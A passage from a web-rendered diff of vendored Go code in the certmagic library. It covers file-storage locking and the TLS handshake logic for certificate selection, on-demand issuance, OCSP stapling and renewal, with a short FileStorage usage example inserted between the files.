||||
return filepath.Join(baseDir, "certmagic")
|
||||
}
|
||||
|
||||
// lockMeta is written into a lock file.
|
||||
type lockMeta struct {
|
||||
Created time.Time `json:"created,omitempty"`
|
||||
Updated time.Time `json:"updated,omitempty"`
|
||||
}
|
||||
|
||||
// lockFreshnessInterval is how often to update
|
||||
// a lock's timestamp. Locks with a timestamp
|
||||
// more than this duration in the past (plus a
|
||||
// grace period for latency) can be considered
|
||||
// stale.
|
||||
const lockFreshnessInterval = 5 * time.Second
|
||||
|
||||
// fileLockPollInterval is how frequently
|
||||
// to check the existence of a lock file
|
||||
const fileLockPollInterval = 1 * time.Second
|
||||
|
||||
// Interface guard
|
||||
var _ Storage = (*FileStorage)(nil)
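A hypothetical end-to-end sketch of the FileStorage API shown above (Lock, Store, Load, Unlock, Filename), again assuming the vendored package is importable as `github.com/caddyserver/certmagic`:

```go
package main

import (
	"context"
	"fmt"
	"log"

	"github.com/caddyserver/certmagic"
)

func main() {
	ctx := context.Background()
	storage := &certmagic.FileStorage{Path: "/tmp/certmagic-demo"}

	// Locks are advisory, file-based, and kept fresh in the background
	// (see the lockMeta / keepLockfileFresh machinery above).
	if err := storage.Lock(ctx, "example-key"); err != nil {
		log.Fatal(err)
	}
	defer storage.Unlock(ctx, "example-key")

	if err := storage.Store(ctx, "example-key", []byte("hello")); err != nil {
		log.Fatal(err)
	}
	val, err := storage.Load(ctx, "example-key")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Printf("stored at %s: %s\n", storage.Filename("example-key"), val)
}
```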
|
817
vendor/github.com/caddyserver/certmagic/handshake.go
generated
vendored
Normal file
@ -0,0 +1,817 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io/fs"
|
||||
"net"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// GetCertificate gets a certificate to satisfy clientHello. In getting
|
||||
// the certificate, it abides the rules and settings defined in the Config
|
||||
// that matches clientHello.ServerName. It tries to get certificates in
|
||||
// this order:
|
||||
//
|
||||
// 1. Exact match in the in-memory cache
|
||||
// 2. Wildcard match in the in-memory cache
|
||||
// 3. Managers (if any)
|
||||
// 4. Storage (if on-demand is enabled)
|
||||
// 5. Issuers (if on-demand is enabled)
|
||||
//
|
||||
// This method is safe for use as a tls.Config.GetCertificate callback.
|
||||
func (cfg *Config) GetCertificate(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
|
||||
cfg.emit("tls_handshake_started", clientHello)
|
||||
|
||||
// special case: serve up the certificate for a TLS-ALPN ACME challenge
|
||||
// (https://tools.ietf.org/html/draft-ietf-acme-tls-alpn-05)
|
||||
for _, proto := range clientHello.SupportedProtos {
|
||||
if proto == acmez.ACMETLS1Protocol {
|
||||
challengeCert, distributed, err := cfg.getTLSALPNChallengeCert(clientHello)
|
||||
if err != nil {
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Error("tls-alpn challenge",
|
||||
zap.String("server_name", clientHello.ServerName),
|
||||
zap.Error(err))
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Info("served key authentication certificate",
|
||||
zap.String("server_name", clientHello.ServerName),
|
||||
zap.String("challenge", "tls-alpn-01"),
|
||||
zap.String("remote", clientHello.Conn.RemoteAddr().String()),
|
||||
zap.Bool("distributed", distributed))
|
||||
}
|
||||
return challengeCert, nil
|
||||
}
|
||||
}
|
||||
|
||||
// get the certificate and serve it up
|
||||
cert, err := cfg.getCertDuringHandshake(clientHello, true, true)
|
||||
if err == nil {
|
||||
cfg.emit("tls_handshake_completed", clientHello)
|
||||
}
|
||||
return &cert.Certificate, err
|
||||
}
|
||||
|
||||
// getCertificateFromCache gets a certificate that matches name from the in-memory
|
||||
// cache, according to the lookup table associated with cfg. The lookup then
|
||||
// points to a certificate in the Instance certificate cache.
|
||||
//
|
||||
// The name is expected to already be normalized (e.g. lowercased).
|
||||
//
|
||||
// If there is no exact match for name, it will be checked against names of
|
||||
// the form '*.example.com' (wildcard certificates) according to RFC 6125.
|
||||
// If a match is found, matched will be true. If no matches are found, matched
|
||||
// will be false and a "default" certificate will be returned with defaulted
|
||||
// set to true. If defaulted is false, then no certificates were available.
|
||||
//
|
||||
// The logic in this function is adapted from the Go standard library,
|
||||
// which is by the Go Authors.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (cfg *Config) getCertificateFromCache(hello *tls.ClientHelloInfo) (cert Certificate, matched, defaulted bool) {
|
||||
name := normalizedName(hello.ServerName)
|
||||
|
||||
if name == "" {
|
||||
// if SNI is empty, prefer matching IP address
|
||||
if hello.Conn != nil {
|
||||
addr := localIPFromConn(hello.Conn)
|
||||
cert, matched = cfg.selectCert(hello, addr)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// fall back to a "default" certificate, if specified
|
||||
if cfg.DefaultServerName != "" {
|
||||
normDefault := normalizedName(cfg.DefaultServerName)
|
||||
cert, defaulted = cfg.selectCert(hello, normDefault)
|
||||
if defaulted {
|
||||
return
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// if SNI is specified, try an exact match first
|
||||
cert, matched = cfg.selectCert(hello, name)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
|
||||
// try replacing labels in the name with
|
||||
// wildcards until we get a match
|
||||
labels := strings.Split(name, ".")
|
||||
for i := range labels {
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
||||
cert, matched = cfg.selectCert(hello, candidate)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// otherwise, we're bingo on ammo; see issues
|
||||
// caddyserver/caddy#2035 and caddyserver/caddy#1303 (any
|
||||
// change to certificate matching behavior must
|
||||
// account for hosts defined where the hostname
|
||||
// is empty or a catch-all, like ":443" or
|
||||
// "0.0.0.0:443")
|
||||
|
||||
return
|
||||
}
|
||||
|
||||
// selectCert uses hello to select a certificate from the
|
||||
// cache for name. If cfg.CertSelection is set, it will be
|
||||
// used to make the decision. Otherwise, the first matching
|
||||
// unexpired cert is returned. As a special case, if no
|
||||
// certificates match name and cfg.CertSelection is set,
|
||||
// then all certificates in the cache will be passed in
|
||||
// for the cfg.CertSelection to make the final decision.
|
||||
func (cfg *Config) selectCert(hello *tls.ClientHelloInfo, name string) (Certificate, bool) {
|
||||
logger := loggerNamed(cfg.Logger, "handshake")
|
||||
choices := cfg.certCache.getAllMatchingCerts(name)
|
||||
if len(choices) == 0 {
|
||||
if cfg.CertSelection == nil {
|
||||
if logger != nil {
|
||||
logger.Debug("no matching certificates and no custom selection logic", zap.String("identifier", name))
|
||||
}
|
||||
return Certificate{}, false
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Debug("no matching certificate; will choose from all certificates", zap.String("identifier", name))
|
||||
}
|
||||
choices = cfg.certCache.getAllCerts()
|
||||
}
|
||||
if logger != nil {
|
||||
logger.Debug("choosing certificate",
|
||||
zap.String("identifier", name),
|
||||
zap.Int("num_choices", len(choices)))
|
||||
}
|
||||
if cfg.CertSelection == nil {
|
||||
cert, err := DefaultCertificateSelector(hello, choices)
|
||||
if logger != nil {
|
||||
logger.Debug("default certificate selection results",
|
||||
zap.Error(err),
|
||||
zap.String("identifier", name),
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, err == nil
|
||||
}
|
||||
cert, err := cfg.CertSelection.SelectCertificate(hello, choices)
|
||||
if logger != nil {
|
||||
logger.Debug("custom certificate selection results",
|
||||
zap.Error(err),
|
||||
zap.String("identifier", name),
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.String("issuer_key", cert.issuerKey),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, err == nil
|
||||
}
|
||||
|
||||
// DefaultCertificateSelector is the default certificate selection logic
|
||||
// given a choice of certificates. If there is at least one certificate in
|
||||
// choices, it always returns a certificate without error. It chooses the
|
||||
// first non-expired certificate that the client supports if possible,
|
||||
// otherwise it returns an expired certificate that the client supports,
|
||||
// otherwise it just returns the first certificate in the list of choices.
|
||||
func DefaultCertificateSelector(hello *tls.ClientHelloInfo, choices []Certificate) (Certificate, error) {
|
||||
if len(choices) == 0 {
|
||||
return Certificate{}, fmt.Errorf("no certificates available")
|
||||
}
|
||||
now := time.Now()
|
||||
best := choices[0]
|
||||
for _, choice := range choices {
|
||||
if err := hello.SupportsCertificate(&choice.Certificate); err != nil {
|
||||
continue
|
||||
}
|
||||
best = choice // at least the client supports it...
|
||||
if now.After(choice.Leaf.NotBefore) && now.Before(choice.Leaf.NotAfter) {
|
||||
return choice, nil // ...and unexpired, great! "Certificate, I choose you!"
|
||||
}
|
||||
}
|
||||
return best, nil // all matching certs are expired or incompatible, oh well
|
||||
}
|
||||
|
||||
// getCertDuringHandshake will get a certificate for hello. It first tries
|
||||
// the in-memory cache. If no exact certificate for hello is in the cache, the
|
||||
// config most closely corresponding to hello (like a wildcard) will be loaded.
|
||||
// If none could be matched from the cache, it invokes the configured certificate
|
||||
// managers to get a certificate and uses the first one that returns a certificate.
|
||||
// If no certificate managers return a value, and if the config allows it
|
||||
// (OnDemand!=nil) and if loadIfNecessary == true, it goes to storage to load the
|
||||
// cert into the cache and serve it. If it's not on disk and if
|
||||
// obtainIfNecessary == true, the certificate will be obtained from the CA, cached,
|
||||
// and served. If obtainIfNecessary == true, then loadIfNecessary must also be == true.
|
||||
// An error will be returned if and only if no certificate is available.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (cfg *Config) getCertDuringHandshake(hello *tls.ClientHelloInfo, loadIfNecessary, obtainIfNecessary bool) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "handshake")
|
||||
|
||||
ctx := context.TODO() // TODO: get a proper context? from somewhere...
|
||||
|
||||
// First check our in-memory cache to see if we've already loaded it
|
||||
cert, matched, defaulted := cfg.getCertificateFromCache(hello)
|
||||
if matched {
|
||||
if log != nil {
|
||||
log.Debug("matched certificate in cache",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
if cert.managed && cfg.OnDemand != nil && obtainIfNecessary {
|
||||
// On-demand certificates are maintained in the background, but
|
||||
// maintenance is triggered by handshakes instead of by a timer
|
||||
// as in maintain.go.
|
||||
return cfg.optionalMaintenance(ctx, loggerNamed(cfg.Logger, "on_demand"), cert, hello)
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// If an external Manager is configured, try to get it from them.
|
||||
// Only continue to use our own logic if it returns empty+nil.
|
||||
externalCert, err := cfg.getCertFromAnyCertManager(ctx, hello, log)
|
||||
if err != nil {
|
||||
return Certificate{}, err
|
||||
}
|
||||
if !externalCert.Empty() {
|
||||
return externalCert, nil
|
||||
}
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
|
||||
// We might be able to load or obtain a needed certificate. Load from
|
||||
// storage if OnDemand is enabled, or if there is the possibility that
|
||||
// a statically-managed cert was evicted from a full cache.
|
||||
cfg.certCache.mu.RLock()
|
||||
cacheSize := len(cfg.certCache.cache)
|
||||
cfg.certCache.mu.RUnlock()
|
||||
|
||||
// A cert might have still been evicted from the cache even if the cache
|
||||
// is no longer completely full; this happens if the newly-loaded cert is
|
||||
// itself evicted (perhaps due to being expired or unmanaged at this point).
|
||||
// Hence, we use an "almost full" metric to allow for the cache to not be
|
||||
// perfectly full while still being able to load needed certs from storage.
|
||||
// See https://caddy.community/t/error-tls-alert-internal-error-592-again/13272
|
||||
// and caddyserver/caddy#4320.
|
||||
cacheCapacity := float64(cfg.certCache.options.Capacity)
|
||||
cacheAlmostFull := cacheCapacity > 0 && float64(cacheSize) >= cacheCapacity*.9
|
||||
loadDynamically := cfg.OnDemand != nil || cacheAlmostFull
|
||||
|
||||
if loadDynamically && loadIfNecessary {
|
||||
// Then check to see if we have one on disk
|
||||
// TODO: As suggested here, https://caddy.community/t/error-tls-alert-internal-error-592-again/13272/30?u=matt,
|
||||
// it might be a good idea to check with the DecisionFunc or allowlist first before even loading the certificate
|
||||
// from storage, since if we can't renew it, why should we even try serving it (it will just get evicted after
|
||||
// we get a return value of false anyway)? See issue #174
|
||||
loadedCert, err := cfg.CacheManagedCertificate(ctx, name)
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
// If no exact match, try a wildcard variant, which is something we can still use
|
||||
labels := strings.Split(name, ".")
|
||||
labels[0] = "*"
|
||||
loadedCert, err = cfg.CacheManagedCertificate(ctx, strings.Join(labels, "."))
|
||||
}
|
||||
if err == nil {
|
||||
if log != nil {
|
||||
log.Debug("loaded certificate from storage",
|
||||
zap.Strings("subjects", loadedCert.Names),
|
||||
zap.Bool("managed", loadedCert.managed),
|
||||
zap.Time("expiration", loadedCert.Leaf.NotAfter),
|
||||
zap.String("hash", loadedCert.hash))
|
||||
}
|
||||
loadedCert, err = cfg.handshakeMaintenance(ctx, hello, loadedCert)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("maintaining newly-loaded certificate",
|
||||
zap.String("server_name", name),
|
||||
zap.Error(err))
|
||||
}
|
||||
}
|
||||
return loadedCert, nil
|
||||
}
|
||||
if cfg.OnDemand != nil && obtainIfNecessary {
|
||||
// By this point, we need to ask the CA for a certificate
|
||||
return cfg.obtainOnDemandCertificate(ctx, hello)
|
||||
}
|
||||
}
|
||||
|
||||
// Fall back to the default certificate if there is one
|
||||
if defaulted {
|
||||
if log != nil {
|
||||
log.Debug("fell back to default certificate",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Bool("managed", cert.managed),
|
||||
zap.Time("expiration", cert.Leaf.NotAfter),
|
||||
zap.String("hash", cert.hash))
|
||||
}
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Debug("no certificate matching TLS ClientHello",
|
||||
zap.String("server_name", hello.ServerName),
|
||||
zap.String("remote", hello.Conn.RemoteAddr().String()),
|
||||
zap.String("identifier", name),
|
||||
zap.Uint16s("cipher_suites", hello.CipherSuites),
|
||||
zap.Float64("cert_cache_fill", float64(cacheSize)/cacheCapacity), // may be approximate! because we are not within the lock
|
||||
zap.Bool("load_if_necessary", loadIfNecessary),
|
||||
zap.Bool("obtain_if_necessary", obtainIfNecessary),
|
||||
zap.Bool("on_demand", cfg.OnDemand != nil))
|
||||
}
|
||||
|
||||
return Certificate{}, fmt.Errorf("no certificate available for '%s'", name)
|
||||
}
|
||||
|
||||
// optionalMaintenance will perform maintenance on the certificate (if necessary) and
|
||||
// will return the resulting certificate. This should only be done if the certificate
|
||||
// is managed, OnDemand is enabled, and the scope is allowed to obtain certificates.
|
||||
func (cfg *Config) optionalMaintenance(ctx context.Context, log *zap.Logger, cert Certificate, hello *tls.ClientHelloInfo) (Certificate, error) {
|
||||
newCert, err := cfg.handshakeMaintenance(ctx, hello, cert)
|
||||
if err == nil {
|
||||
return newCert, nil
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Error("renewing certificate on-demand failed",
|
||||
zap.Strings("subjects", cert.Names),
|
||||
zap.Time("not_after", cert.Leaf.NotAfter),
|
||||
zap.Error(err))
|
||||
}
|
||||
|
||||
if cert.Expired() {
|
||||
return cert, err
|
||||
}
|
||||
|
||||
// still has time remaining, so serve it anyway
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// checkIfCertShouldBeObtained checks to see if an on-demand TLS certificate
|
||||
// should be obtained for a given domain based upon the config settings. If
|
||||
// a non-nil error is returned, do not issue a new certificate for name.
|
||||
func (cfg *Config) checkIfCertShouldBeObtained(name string) error {
|
||||
if cfg.OnDemand == nil {
|
||||
return fmt.Errorf("not configured for on-demand certificate issuance")
|
||||
}
|
||||
if !SubjectQualifiesForCert(name) {
|
||||
return fmt.Errorf("subject name does not qualify for certificate: %s", name)
|
||||
}
|
||||
if cfg.OnDemand.DecisionFunc != nil {
|
||||
return cfg.OnDemand.DecisionFunc(name)
|
||||
}
|
||||
if len(cfg.OnDemand.hostWhitelist) > 0 &&
|
||||
!cfg.OnDemand.whitelistContains(name) {
|
||||
return fmt.Errorf("certificate for '%s' is not managed", name)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// obtainOnDemandCertificate obtains a certificate for hello.
|
||||
// If another goroutine has already started obtaining a cert for
|
||||
// hello, it will wait and use what the other goroutine obtained.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) obtainOnDemandCertificate(ctx context.Context, hello *tls.ClientHelloInfo) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
|
||||
getCertWithoutReobtaining := func() (Certificate, error) {
|
||||
// very important to set the obtainIfNecessary argument to false, so we don't repeat this infinitely
|
||||
return cfg.getCertDuringHandshake(hello, true, false)
|
||||
}
|
||||
|
||||
// We must protect this process from happening concurrently, so synchronize.
|
||||
obtainCertWaitChansMu.Lock()
|
||||
wait, ok := obtainCertWaitChans[name]
|
||||
if ok {
|
||||
// lucky us -- another goroutine is already obtaining the certificate.
|
||||
// wait for it to finish obtaining the cert and then we'll use it.
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
// TODO: see if we can get a proper context in here, for true cancellation
|
||||
timeout := time.NewTimer(2 * time.Minute)
|
||||
select {
|
||||
case <-timeout.C:
|
||||
return Certificate{}, fmt.Errorf("timed out waiting to obtain certificate for %s", name)
|
||||
case <-wait:
|
||||
timeout.Stop()
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// looks like it's up to us to do all the work and obtain the cert.
|
||||
// make a chan others can wait on if needed
|
||||
wait = make(chan struct{})
|
||||
obtainCertWaitChans[name] = wait
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
unblockWaiters := func() {
|
||||
obtainCertWaitChansMu.Lock()
|
||||
close(wait)
|
||||
delete(obtainCertWaitChans, name)
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
}
|
||||
|
||||
// Make sure the certificate should be obtained based on config
|
||||
err := cfg.checkIfCertShouldBeObtained(name)
|
||||
if err != nil {
|
||||
unblockWaiters()
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Info("obtaining new certificate", zap.String("server_name", name))
|
||||
}
|
||||
|
||||
// TODO: we are only adding a timeout because we don't know if the context passed in is actually cancelable...
|
||||
// (timeout duration is based on https://caddy.community/t/zerossl-dns-challenge-failing-often-route53-plugin/13822/24?u=matt)
|
||||
var cancel context.CancelFunc
|
||||
ctx, cancel = context.WithTimeout(ctx, 180*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// Obtain the certificate
|
||||
err = cfg.ObtainCertAsync(ctx, name)
|
||||
|
||||
// immediately unblock anyone waiting for it; doing this in
|
||||
// a defer would risk deadlock because of the recursive call
|
||||
// to getCertDuringHandshake below when we return!
|
||||
unblockWaiters()
|
||||
|
||||
if err != nil {
|
||||
// shucks; failed to solve challenge on-demand
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
// success; certificate was just placed on disk, so
|
||||
// we need only restart serving the certificate
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// handshakeMaintenance performs a check on cert for expiration and OCSP validity.
|
||||
// If necessary, it will renew the certificate and/or refresh the OCSP staple.
|
||||
// OCSP stapling errors are not returned, only logged.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) handshakeMaintenance(ctx context.Context, hello *tls.ClientHelloInfo, cert Certificate) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
// Check OCSP staple validity
|
||||
if cert.ocsp != nil && !freshOCSP(cert.ocsp) {
|
||||
if log != nil {
|
||||
log.Debug("OCSP response needs refreshing",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Int("ocsp_status", cert.ocsp.Status),
|
||||
zap.Time("this_update", cert.ocsp.ThisUpdate),
|
||||
zap.Time("next_update", cert.ocsp.NextUpdate))
|
||||
}
|
||||
|
||||
err := stapleOCSP(ctx, cfg.OCSP, cfg.Storage, &cert, nil)
|
||||
if err != nil {
|
||||
// An error with OCSP stapling is not the end of the world, and in fact, is
|
||||
// quite common considering not all certs have issuer URLs that support it.
|
||||
if log != nil {
|
||||
log.Warn("stapling OCSP",
|
||||
zap.String("server_name", hello.ServerName),
|
||||
zap.Error(err))
|
||||
}
|
||||
} else if log != nil {
	log.Debug("successfully stapled new OCSP response",
		zap.Strings("identifiers", cert.Names),
		zap.Int("ocsp_status", cert.ocsp.Status),
		zap.Time("this_update", cert.ocsp.ThisUpdate),
		zap.Time("next_update", cert.ocsp.NextUpdate))
}
|
||||
|
||||
// our copy of cert has the new OCSP staple, so replace it in the cache
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.cache[cert.hash] = cert
|
||||
cfg.certCache.mu.Unlock()
|
||||
}
|
||||
|
||||
// We attempt to replace any certificates that were revoked.
|
||||
// Crucially, this happens OUTSIDE a lock on the certCache.
|
||||
if certShouldBeForceRenewed(cert) {
|
||||
if log != nil {
|
||||
log.Warn("on-demand certificate's OCSP status is REVOKED; will try to forcefully renew",
|
||||
zap.Strings("identifiers", cert.Names),
|
||||
zap.Int("ocsp_status", cert.ocsp.Status),
|
||||
zap.Time("revoked_at", cert.ocsp.RevokedAt),
|
||||
zap.Time("this_update", cert.ocsp.ThisUpdate),
|
||||
zap.Time("next_update", cert.ocsp.NextUpdate))
|
||||
}
|
||||
return cfg.renewDynamicCertificate(ctx, hello, cert)
|
||||
}
|
||||
|
||||
// Check cert expiration
|
||||
if currentlyInRenewalWindow(cert.Leaf.NotBefore, cert.Leaf.NotAfter, cfg.RenewalWindowRatio) {
|
||||
return cfg.renewDynamicCertificate(ctx, hello, cert)
|
||||
}
|
||||
|
||||
return cert, nil
|
||||
}
|
||||
|
||||
// renewDynamicCertificate renews the certificate for name using cfg. It returns the
|
||||
// certificate to use and an error, if any. name should already be lower-cased before
|
||||
// calling this function. name is the name obtained directly from the handshake's
|
||||
// ClientHello. If the certificate hasn't yet expired, currentCert will be returned
|
||||
// and the renewal will happen in the background; otherwise this blocks until the
|
||||
// certificate has been renewed, and returns the renewed certificate.
|
||||
//
|
||||
// If the certificate's OCSP status (currentCert.ocsp) is Revoked, it will be forcefully
|
||||
// renewed even if it is not expiring.
|
||||
//
|
||||
// This function is safe for use by multiple concurrent goroutines.
|
||||
func (cfg *Config) renewDynamicCertificate(ctx context.Context, hello *tls.ClientHelloInfo, currentCert Certificate) (Certificate, error) {
|
||||
log := loggerNamed(cfg.Logger, "on_demand")
|
||||
|
||||
name := cfg.getNameFromClientHello(hello)
|
||||
timeLeft := time.Until(currentCert.Leaf.NotAfter)
|
||||
revoked := currentCert.ocsp != nil && currentCert.ocsp.Status == ocsp.Revoked
|
||||
|
||||
getCertWithoutReobtaining := func() (Certificate, error) {
|
||||
// very important to set the obtainIfNecessary argument to false, so we don't repeat this infinitely
|
||||
return cfg.getCertDuringHandshake(hello, true, false)
|
||||
}
|
||||
|
||||
// see if another goroutine is already working on this certificate
|
||||
obtainCertWaitChansMu.Lock()
|
||||
wait, ok := obtainCertWaitChans[name]
|
||||
if ok {
|
||||
// lucky us -- another goroutine is already renewing the certificate
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
// the current certificate hasn't expired, and another goroutine is already
|
||||
// renewing it, so we might as well serve what we have without blocking, UNLESS
|
||||
// we're forcing renewal, in which case the current certificate is not usable
|
||||
if timeLeft > 0 && !revoked {
|
||||
if log != nil {
|
||||
log.Debug("certificate expires soon but is already being renewed; serving current certificate",
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Duration("remaining", timeLeft))
|
||||
}
|
||||
return currentCert, nil
|
||||
}
|
||||
|
||||
// otherwise, we'll have to wait for the renewal to finish so we don't serve
|
||||
// a revoked or expired certificate
|
||||
|
||||
if log != nil {
|
||||
log.Debug("certificate has expired, but is already being renewed; waiting for renewal to complete",
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Time("expired", currentCert.Leaf.NotAfter),
|
||||
zap.Bool("revoked", revoked))
|
||||
}
|
||||
|
||||
// TODO: see if we can get a proper context in here, for true cancellation
|
||||
timeout := time.NewTimer(2 * time.Minute)
|
||||
select {
|
||||
case <-timeout.C:
|
||||
return Certificate{}, fmt.Errorf("timed out waiting for certificate renewal of %s", name)
|
||||
case <-wait:
|
||||
timeout.Stop()
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// looks like it's up to us to do all the work and renew the cert
|
||||
wait = make(chan struct{})
|
||||
obtainCertWaitChans[name] = wait
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
|
||||
unblockWaiters := func() {
|
||||
obtainCertWaitChansMu.Lock()
|
||||
close(wait)
|
||||
delete(obtainCertWaitChans, name)
|
||||
obtainCertWaitChansMu.Unlock()
|
||||
}
|
||||
|
||||
if log != nil {
|
||||
log.Info("attempting certificate renewal",
|
||||
zap.String("server_name", name),
|
||||
zap.Strings("subjects", currentCert.Names),
|
||||
zap.Time("expiration", currentCert.Leaf.NotAfter),
|
||||
zap.Duration("remaining", timeLeft),
|
||||
zap.Bool("revoked", revoked))
|
||||
}
|
||||
|
||||
// Make sure a certificate for this name should be obtained on-demand
|
||||
err := cfg.checkIfCertShouldBeObtained(name)
|
||||
if err != nil {
|
||||
// if not, remove from cache (it will be deleted from storage later)
|
||||
cfg.certCache.mu.Lock()
|
||||
cfg.certCache.removeCertificate(currentCert)
|
||||
cfg.certCache.mu.Unlock()
|
||||
unblockWaiters()
|
||||
return Certificate{}, err
|
||||
}
|
||||
|
||||
// Renew and reload the certificate
|
||||
renewAndReload := func(ctx context.Context, cancel context.CancelFunc) (Certificate, error) {
|
||||
defer cancel()
|
||||
|
||||
// otherwise, renew with issuer, etc.
|
||||
var newCert Certificate
|
||||
if revoked {
|
||||
newCert, err = cfg.forceRenew(ctx, log, currentCert)
|
||||
} else {
|
||||
err = cfg.RenewCertAsync(ctx, name, false)
|
||||
if err == nil {
|
||||
// even though the recursive nature of the dynamic cert loading
|
||||
// would just call this function anyway, we do it here to
|
||||
// make the replacement as atomic as possible.
|
||||
newCert, err = cfg.CacheManagedCertificate(ctx, name)
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("loading renewed certificate", zap.String("server_name", name), zap.Error(err))
|
||||
}
|
||||
} else {
|
||||
// replace the old certificate with the new one
|
||||
cfg.certCache.replaceCertificate(currentCert, newCert)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// immediately unblock anyone waiting for it; doing this in
|
||||
// a defer would risk deadlock because of the recursive call
|
||||
// to getCertDuringHandshake below when we return!
|
||||
unblockWaiters()
|
||||
|
||||
if err != nil {
|
||||
if log != nil {
|
||||
log.Error("renewing and reloading certificate",
|
||||
zap.String("server_name", name),
|
||||
zap.Error(err),
|
||||
zap.Bool("forced", revoked))
|
||||
}
|
||||
return newCert, err
|
||||
}
|
||||
|
||||
return getCertWithoutReobtaining()
|
||||
}
|
||||
|
||||
// if the certificate hasn't expired, we can serve what we have and renew in the background
|
||||
if timeLeft > 0 {
|
||||
ctx, cancel := context.WithTimeout(ctx, 5*time.Minute)
|
||||
go renewAndReload(ctx, cancel)
|
||||
return currentCert, nil
|
||||
}
|
||||
|
||||
// otherwise, we have to block while we renew an expired certificate
|
||||
ctx, cancel := context.WithTimeout(ctx, 90*time.Second)
|
||||
return renewAndReload(ctx, cancel)
|
||||
}
|
||||
|
||||
// getCertFromAnyCertManager gets a certificate from cfg's Managers. If there are no Managers defined, this is
|
||||
// a no-op that returns empty values. Otherwise, it gets a certificate for hello from the first Manager that
|
||||
// returns a certificate and no error.
|
||||
func (cfg *Config) getCertFromAnyCertManager(ctx context.Context, hello *tls.ClientHelloInfo, log *zap.Logger) (Certificate, error) {
|
||||
// fast path if nothing to do
|
||||
if len(cfg.Managers) == 0 {
|
||||
return Certificate{}, nil
|
||||
}
|
||||
|
||||
var upstreamCert *tls.Certificate
|
||||
|
||||
// try all the GetCertificate methods on external managers; use first one that returns a certificate
|
||||
for i, certManager := range cfg.Managers {
|
||||
var err error
|
||||
upstreamCert, err = certManager.GetCertificate(ctx, hello)
|
||||
if err != nil {
|
||||
log.Error("getting certificate from external certificate manager",
|
||||
zap.String("sni", hello.ServerName),
|
||||
zap.Int("cert_manager", i),
|
||||
zap.Error(err))
|
||||
continue
|
||||
}
|
||||
if upstreamCert != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
